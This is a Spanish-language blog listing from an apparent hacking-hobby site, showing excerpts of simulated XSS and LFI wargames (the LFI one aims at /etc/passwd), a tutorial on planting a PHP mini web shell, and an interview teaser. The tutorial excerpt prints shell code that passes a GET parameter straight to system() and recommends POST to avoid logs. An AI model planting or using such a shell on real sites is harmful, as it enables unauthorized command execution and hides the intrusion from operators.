Wargame XSS

Hola amigos.Tiempo sin programar algún wargame, Bien este consiste en lograr sacar una alerta (El XSS esta simulado).pero cuando logres el vector correcto te dirá que pasaste la prueba así que... ¡SUERTE! Link Publiquen sus fotos aquí en la entrada. Salud...

Read More

Creando un minibackdoor en PHP

Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea). Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El codigo seria así: <form method="GET" action="lol.php"> <input type="text" name="comando"> <input type="submit" value="ejecutar"> <?php if(isset($_GET['comando'])); { $lol = @system($_GET['comando']); echo...

Read More

Wargame: Consigue el etc/passwd con LFI

Hola amigos. hace mucho no creo un wargame y pues bueno les dejo este:Consiste en poner en el formulario de texto los directorios a subir para logar sacar el LFI (Es una simulacion)Cuando saquen el LFI les satara una alerta diciendo que has pasado el wargame)Debes tomar foto a esa alerta y publicarla en esta entrada ó en el post correspondiente de underc0de (Ver post)Espero les guste. Link del wargame Salud...

Read More

Entrevista a Moften.

Estamos con @Moften. Programador, Developer, Pentester, auditor, Entre otras muchas cosas. Nos hablara sobre sus mas grandes experiencias y proyectos...

Read More